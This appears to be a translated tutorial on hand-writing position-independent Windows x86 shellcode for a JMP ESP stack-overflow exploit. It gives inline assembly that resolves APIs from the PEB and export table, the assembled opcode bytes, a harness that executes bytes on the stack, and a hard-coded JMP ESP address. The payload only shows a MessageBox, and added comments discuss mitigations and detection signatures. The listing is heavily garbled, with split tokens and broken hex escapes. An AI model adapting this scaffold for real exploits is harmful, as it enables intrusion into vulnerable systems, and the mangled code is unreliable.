Using the JMP ESP principle: there are many such instructions in Windows.
First, find one with DBG.
Then convert the shellcode into opcodes; it can be tested first (the code and the opcodes are at the end).
Add some extra 90 90 (NOP) bytes, because some of the functions have several parameters.
Run
/*
 * Whitespace-mangled listing of the first test harness (MSVC inline assembly,
 * 32-bit x86 only, not portable C/C++). The run-in prose ("Get critical module
 * Base address", "Gets the function address of ...", "Show") are the author's
 * original `//` comments whose markers were lost, and tokens such as
 * "_ ASM _emit (0X65)" / "_asm _em It" are extraction damage, not code.
 *
 * What the visible code does:
 *   - PUSHAD saves all registers; SUB ESP,0x100 moves the stack 0x100 bytes
 *     down, presumably so the shellcode's own pushes cannot overwrite the
 *     bytes it executes from — TODO confirm against the exploit buffer layout.
 *   - JMP Tag_shellcode skips six NUL-terminated strings emitted with _emit.
 *   - "call tag_next; pop ebx" loads the address of Tag_next into EBX; every
 *     string is then addressed as [ebx-N]. The page's own annotation
 *     "[tag_next-0x52]" for "GetProcAddress" is off by one: the strings total
 *     0x4e bytes plus the 5-byte CALL, and the code (lea edi,[ebx-0x53]) uses
 *     -0x53; the other five offsets (-0x44/-0x35/-0x2a/-0x1e/-0x12) agree.
 *   - The chain fs:[0x30] -> +0x0c -> +0x1c -> [esi] -> +0x08 reads a module
 *     base from the PEB loader lists by fixed list position. Which module sits
 *     at that position is OS-version dependent, so this is brittle across
 *     Windows releases; the page assumes (but does not verify) it is kernel32.
 *   - Fun_getprocaddress (two args, RETN 0x08) parses the PE export directory
 *     and compares 0x0e bytes of each exported name (the terminator is not
 *     compared). It clobbers ESI/EDI/EBX without saving them.
 *   - Fun_payload (four args, RETN 0x10) resolves the remaining APIs and ends
 *     in ExitProcess, so PUSHAD is never balanced by a POPAD and the final
 *     RETN is unreachable.
 *
 * Detection-relevant features visible here: plain ASCII "GetProcAddress" /
 * "LoadLibraryExA" strings embedded in code, the fs:[0x30] read
 * (64 8b 35 30 00 00 00 in the byte listing below) and the call/pop get-PC
 * sequence are the classic static signatures of position-independent
 * Windows shellcode.
 */
ConsoleApplication2.cpp: Defines the entry point of the console application. #include "stdafx.h" int _tmain (int argc, _tchar* argv[]) {__asm {Pushad; Sub ESP, 0x100; JMP Tag_shellcode; [tag_next-0x52] "GetProcAddress" _asm _emit (0x47) _asm _emit (0x65) _asm _emit (0x74) _asm _emit (0x50) _asm _emit (0x72) _asm _emit (0x6f) _asm _emit (0x63) _asm _emit (0x41) _asm _emit (0x64) _asm _emit (0x64) _asm _emit (0x72) _ ASM _emit (0X65) _asm _emit (0x73) _asm _emit (0x73) _asm _emit (0x00)//[tag_next-0x44] "Loadlibraryexa\0" _asm _emit (0x4c) _asm _emit (0x6f) _asm _emit (0x61) _asm _emit (0x64) _asm _emit (0x4c) _asm _emit (0x69) _asm _emit (0x62) _asm _emit (0x72) _asm _emit (0x61) _asm _emit (0x72) _asm _emit (0x79) _asm _emit (0x45) _asm _emit (0x78) _asm _emit (0x41) _asm _emit (0x00)//[tag_next-0x35] "User32.dll\0" _asm _emit (0x55) _asm _emit (0x73) _asm _emit (0x65) _asm _emit (0x72) _asm _emit (0x33) _asm _emit (0x32) _asm _emit (0x2e) _asm _emit (0x64) _asm _emit (0x6c) _asm _emit (0x6c) _asm _emit (0x00)//[tag_next-0x2a] "Messageboxa\0" _asm _emit (0x4d) _asm _emit (0x65) _asm _emit (0x73) _asm _emit (0x73) _asm _emit (0x61) _asm _emit (0x67) _asm _em It (0x65) _asm _emit (0x42) _asm _emit (0x6f) _asm _emit (0x78) _asm _emit (0x41) _asm _emit (0x00)//[tag_next-0x 1E] "exitprocess\0" _asm _emit (0x45) _asm _emit (0x78) _asm _emit (0x69) _asm _emit (0x74) _asm _emit (0x50) _a SM _emit (0x72) _asm _emit (0x6f) _asm _emit (0x63) _asm _emit (0x65) _asm _emit (0x73) _asm _emit (0x73) _asm _emit (0x00 )//[tag_next-0x12] "Hello world!\0" _asm _emit (0x48) _asm _emit (0x65) _asm _emit (0x6c) _asm _emit (0x6c) _asm _emit (0x6f) _asm _emit (0x20) _asm _emit (0x57) _asm _emit (0x6f) _asm _emit (0x72) _asm _emit (0x6c) _asm _em It (0x64) _asm _emit (0x21) _asm _emit (0x00) /* get-PC: CALL pushes the address of Tag_next, POP EBX retrieves it; the strings above are then [ebx-N] */ Tag_shellcode:call tag_next; Tag_next: Pop ebx; Get critical module Base address /* fs:[0x30] is the PEB (32-bit); the fixed +0x0c/+0x1c/[esi]/+0x08 chain selects a module base by list position, which is OS-version dependent */ mov esi, DWORD ptr fs: [0x30]; mov esi, [esi + 0x0c]; mov esi, [esi + 0x1c]; mov esi, [esi]; mov edx, [esi + 0x08]; Gets 
the function address of the GetProcAddress /* args as seen by the callee: [ebp+0x08] = module base (edx), [ebp+0x0c] = Tag_next (ebx) */ push ebx; Push edx; Call fun_getprocaddress; mov esi, eax; Gets the function address of the loadlibraryexa push edx; Lea ECX, [ebx-0x44]; push ecx; Push edx; call eax; Pop edx; Call payload partial /* Fun_payload args: base, LoadLibraryExA, GetProcAddress, Tag_next */ push ebx; Push ESI; push eax; Push edx; Call Fun_payload; /* Fun_getprocaddress(base, strings): e_lfanew (+0x3c) -> export directory RVA (+0x78) -> AddressOfFunctions/AddressOfNames/AddressOfNameOrdinals (+0x1c/+0x20/+0x24); scans the name table comparing 0x0e bytes with [ebx-0x53] ("GetProcAddress"), maps name index -> ordinal -> function RVA and returns the VA in EAX. Only EDX is preserved; RETN 0x08 removes both args. */ Fun_getprocaddress:push EBP; MOV ebp, esp; Sub ESP, 0x0c; Push edx; Get the address of eat, ENT and EOT mov edx, [ebp + 0x08]; mov esi, [edx + 0x3c]; Lea ESI, [edx + esi]; mov esi, [esi + 0x78]; Lea ESI, [edx + esi]; mov edi, [esi + 0x1c]; Lea EDI, [edx + edi]; MOV[EBP-0X04], EDI; mov edi, [esi + 0x20]; Lea EDI, [edx + edi]; MOV[EBP-0X08], EDI; mov edi, [esi + 0x24]; Lea EDI, [edx + edi]; MOV[EBP-0X0C], EDI; The cycle compares the function name in ENT with the XOR eax, eax; JMP tag_firstcmp; Tag_cmpfunnameloop:inc eax; Tag_firstcmp:mov esi, [ebp-0x08]; mov esi, [esi + 4 * EAX]; mov edx, [Ebp +0X08]; Lea ESI, [edx + esi]; mov ebx, [ebp + 0x0c]; Lea EDI, [ebx-0x53]; mov ecx, 0x0e; Cld Repe CMPSB; Jne Tag_cmpfunnameloop; Successful after finding the corresponding serial number mov esi, [ebp-0x0c]; XOR EDI, EDI; mov di, [esi + eax * 2]; Use the ordinal as the index, find the function address corresponding to the functions of the name mov edx, [ebp-0x04]; mov esi, [edx + EDI * 4]; mov edx, [ebp + 0x08]; Returns the key function that gets to the address of Lea EAX, [edx + esi]; Pop edx; mov esp, EBP; Pop ebp; RETN 0x08; /* Fun_payload: LoadLibraryExA("User32.dll", 0, 0); GetProcAddress(user32, "MessageBoxA"); GetProcAddress(base, "ExitProcess"); MessageBoxA(0, "Hello world!", "Hello world!", 0); ExitProcess(0). Because ExitProcess does not return, the RETN 0x10 below is never executed. */ Fun_payload:push EBP; MOV ebp, esp; Sub ESP, 0x08; mov ebx, [ebp + 0x14]; Get MeSsageboxa function Address Lea ecx, [ebx-0x35]; Push 0; Push 0; push ecx; CALL[EBP + 0x0c]; Lea ECX, [ebx-0x2a]; push ecx; push eax; CALL[EBP + 0x10]; MOV[EBP-0X04], eax; Get the function address of ExitProcess lea ECX, [ebx-0x1e]; push ecx; PUSH[EBP + 0x08]; CALL[EBP + 0x10]; MOV[EBP-0X08], eax; Show Lea ECX, [ebx-0x12]; Push 0; push ecx; push ecx; Push 0; CALL[EBP-0X04]; Push 0; CALL[EBP-0X08]; mov esp, EBP; Pop ebp; RETN 0x10; } return 0;}
/*
 * Second test harness: the assembled bytes of the shellcode above, stored in
 * a char array on the stack and entered with "lea eax, bshellcode; push eax;
 * ret". This only works when the process stack is executable; with DEP/NX
 * enabled the RET into the stack buffer raises an access violation, which is
 * exactly the mitigation this technique predates.
 *
 * Two things a reader should know about the byte string:
 *   - It ends at \xc2, i.e. the RETN 0x10 at the end of Fun_payload is
 *     missing its 16-bit immediate (the assembly listing above ends with
 *     "RETN 0x10"). This is harmless only because ExitProcess is called
 *     before that RET is reached.
 *   - Hex escapes split across line wraps ("\x4 7", "\ X41", "\X8b") are
 *     extraction damage; the table of 0x.. values further down is the same
 *     sequence without the damage.
 * Because the initializer is a string literal, the compiler appends one
 * extra NUL byte; the embedded \x00 bytes are fine inside a brace-initialized
 * char array.
 */
#include "stdafx.h" int _tmain (int argc, _tchar* argv[]) {char bshellcode[] = {"\x60\x81\xec\x00\x01\x00\x00\xeb\x4e\x4 7\x65\x74\x50\x72\x6f\x63\x41\x64\x64\x72\x65\x73\x73\x00\x4c\x6f\x61\x64\x4c\x69\x62\x72\x61\x72\x79\x45\x78\ X41\x00\x55\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x00\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x00\x45\x78\ X69\x74\x50\x72\x6f\x63\x65\x73\x73\x00\x48\x65\x6c\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x21\x00\xe8\x00\x00\x00\ X00\x5b\x64\x8b\x35\x30\x00\x00\x00\x8b\x76\x0c\x8b\x76\x1c\x8b\x36\x8b\x56\x08\x53\x52\xe8\x14\x00\x00\x00\ X8b\xf0\x52\x8d\x4b\xbc\x51\x52\xff\xd0\x5a\x53\x56\x50\x52\xe8\x6e\x00\x00\x00\x55\x8b\xec\x83\xec\x0c\x52\ X8b\x55\x08\x8b\x72\x3c\x8d\x34\x32\x8b\x76\x78\x8d\x34\x32\x8b\x7e\x1c\x8d\x3c\x3a\x89\x7d\xfc\x8b\x7e\x20\ X8d\x3c\x3a\x89\x7d\xf8\x8b\x7e\x24\x8d\x3c\x3a\x89\x7d\xf4\x33\xc0\xeb\x01\x40\x8b\x75\xf8\x8b\x34\x86\x8b\ X55\x08\x8d\x34\x32\x8b\x5d\x0c\x8d\x7b\xad\xb9\x0e\x00\x00\x00\xfc\xf3\xa6\x75\xe3\x8b\x75\xf4\x33\xff\x66\ X8b\x3c\x46\X8b\x55\xfc\x8b\x34\xba\x8b\x55\x08\x8d\x04\x32\x5a\x8b\xe5\x5d\xc2\x08\x00\x55\x8b\xec\x83\xec\x08\x8b\x5d\ X14\x8d\x4b\xcb\x6a\x00\x6a\x00\x51\xff\x55\x0c\x8d\x4b\xd6\x51\x50\xff\x55\x10\x89\x45\xfc\x8d\x4b\xe2\x51\ Xff\x75\x08\xff\x55\x10\x89\x45\xf8\x8d\x4b\xee\x6a\x00\x51\x51\x6a\x00\xff\x55\xfc\x6a\x00\xff\x55\xf8\x8b\ Xe5\x5d\xc2 "}; /* jump into the stack array: requires an executable stack */ __asm {lea eax, Bshellcode; push eax; RET} return 0;}
"\x60\x81\xec\x00\x01\x00\x00\xeb\x4e\x47\x65\x74\x50\x72\x6f\x63\x41\x64\x64\x72\x65\x73\x73\x00\x4c\x6f\x61\ X64\x4c\x69\x62\x72\x61\x72\x79\x45\x78\x41\x00\x55\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x00\x4d\x65\x73\x73\ X61\x67\x65\x42\x6f\x78\x41\x00\x45\x78\x69\x74\x50\x72\x6f\x63\x65\x73\x73\x00\x48\x65\x6c\x6c\x6f\x20\x57\ X6f\x72\x6c\x64\x21\x00\xe8\x00\x00\x00\x00\x5b\x64\x8b\x35\x30\x00\x00\x00\x8b\x76\x0c\x8b\x76\x1c\x8b\x36\ X8b\x56\x08\x53\x52\xe8\x14\x00\x00\x00\x8b\xf0\x52\x8d\x4b\xbc\x51\x52\xff\xd0\x5a\x53\x56\x50\x52\xe8\x6e\ X00\x00\x00\x55\x8b\xec\x83\xec\x0c\x52\x8b\x55\x08\x8b\x72\x3c\x8d\x34\x32\x8b\x76\x78\x8d\x34\x32\x8b\x7e\ X1c\x8d\x3c\x3a\x89\x7d\xfc\x8b\x7e\x20\x8d\x3c\x3a\x89\x7d\xf8\x8b\x7e\x24\x8d\x3c\x3a\x89\x7d\xf4\x33\xc0\ Xeb\x01\x40\x8b\x75\xf8\x8b\x34\x86\x8b\x55\x08\x8d\x34\x32\x8b\x5d\x0c\x8d\x7b\xad\xb9\x0e\x00\x00\x00\xfc\ Xf3\xa6\x75\xe3\x8b\x75\xf4\x33\xff\x66\x8b\x3c\x46\x8b\x55\xfc\x8b\x34\xba\x8b\x55\x08\x8d\x04\x32\x5a\x8b\ xe5\x5d\xc2\x08\x00\x55\x8B\xec\x83\xec\x08\x8b\x5d\x14\x8d\x4b\xcb\x6a\x00\x6a\x00\x51\xff\x55\x0c\x8d\x4b\xd6\x51\x50\xff\x55\x10\x89\ X45\xfc\x8d\x4b\xe2\x51\xff\x75\x08\xff\x55\x10\x89\x45\xf8\x8d\x4b\xee\x6a\x00\x51\x51\x6a\x00\xff\x55\xfc\ X6a\x00\xff\x55\xf8\x8b\xe5\x5d\xc2 "77460a9b jmp ESP Address {0x60, 0x81, 0xEC, 0x00, 0x01, 0x00, 0x00, 0xEB, 0x4E, 0x47, 0x65, 0x74, 0x50, 0x72, 0x6F, 0x63,0x41, 0x64, 0x64, 0x72, 0x65, 0x73, 0x73, 0x00, 0x4C, 0x6F, 0x61, 0x64, 0x4C, 0x69, 0x62, 0x 72,0x61, 0x72, 0x79, 0x45, 0x78, 0x41, 0x00, 0x55, 0x73, 0x65, 0x72, 0x33, 0x32, 0x2e, 0x64, 0x6c,0x6c, 0x00, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x42, 0x6F, 0x78, 0x41, 0x00, 0x45, 0x78,0x69, 0x74, 0x50, 0x72, 0x6F, 0x63, 0x65, 0x73, 0x7 3, 0x00, 0x48, 0x65, 0x6c, 0x6c, 0x6F, 0x20,0x57, 0x6F, 0x72, 0x6c, 0x64, 0x21, 0x00, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x5b, 0x64, 0x8b, 0x35,0x30, 0x00, 0x00, 0x00, 0x8b, 0x76, 0x0C, 0x8b, 0x76, 0x1C, 0x8b, 0x36, 0x8b, 0x56, 0x08, 0x53,0x52, 0xe8 , 0x14, 0x00, 0x00, 0x00, 
0x8b, 0xF0, 0x52, 0x8d,0x4B, 0xBC, 0x51, 0x52, 0xFF, 0xd0,0x5a, 0x53, 0x56, 0x50, 0x52, 0xe8, 0x6e, 0x00, 0x00, 0x00, 0x55, 0x8b, 0xEC, 0x83, 0xE C, 0x0c,0x52, 0x8b, 0x55, 0x08, 0x8b, 0x72, 0x3C, 0x8d, 0x34, 0x32, 0x8b, 0x76, 0x78, 0x8d, 0x34, 0x32,0x8b, 0x7E, 0x1C, 0 x8d, 0x3C, 0x3A, 0x89, 0x7d, 0xFC, 0x8b, 0x7E, 0x20, 0x8d, 0x3C, 0x3A, 0x89,0x7d, 0xF8, 0x8b, 0x7E, 0x24, 0x8d, 0x3C, 0x3A , 0x89, 0x7d, 0xf4, 0x33, 0xC0, 0xEB, 0x01, 0x40,0x8b, 0x75, 0xF8, 0x8b, 0x34, 0x86, 0x8b, 0x55, 0x08, 0x8d, 0x34, 0x32, 0 x8b, 0x5d, 0x0C, 0x8d,0x7b, 0xAD, 0xb9, 0x0E, 0x00, 0x00, 0x00, 0xFC, 0xf3, 0xa6, 0x75, 0xe3, 0x8b, 0x75, 0xf4, 0x33,0xff, 0x66, 0x8b, 0x3C, 0x46, 0x8b, 0x55, 0xFC, 0x8b, 0x34, 0xBA, 0x8b, 0x55, 0x08, 0x8d, 0x04,0x32, 0x5A, 0x8b, 0xe5, 0x5d, 0x C2, 0x08, 0x00, 0x55, 0x8b, 0xEC, 0x83, 0xEC, 0x08, 0x8b, 0x5d,0x14, 0x8d, 0x4B, 0xCB, 0x6A, 0x00, 0x6A, 0x00, 0x51, 0xFF, 0x55, 0x0C, 0x8d, 0x4B, 0xd6, 0x51,0x50, 0xFF, 0x55, 0x10, 0x89, 0x45, 0xFC, 0x8d, 0x4B, 0xe2, 0x51, 0xFF, 0x75, 0x08, 0x FF, 0x55,0x10, 0x89, 0x45, 0xF8, 0x8d, 0x4B, 0xEE, 0x6A, 0x00, 0x51, 0x51, 0x6A, 0x00, 0xFF, 0x55, 0xfc,0x6a, 0x00, 0xFF, 0x55, 0xF8, 0x8b, 0xe5, 0X5D, 0xC2};
Making cross-platform Shellcode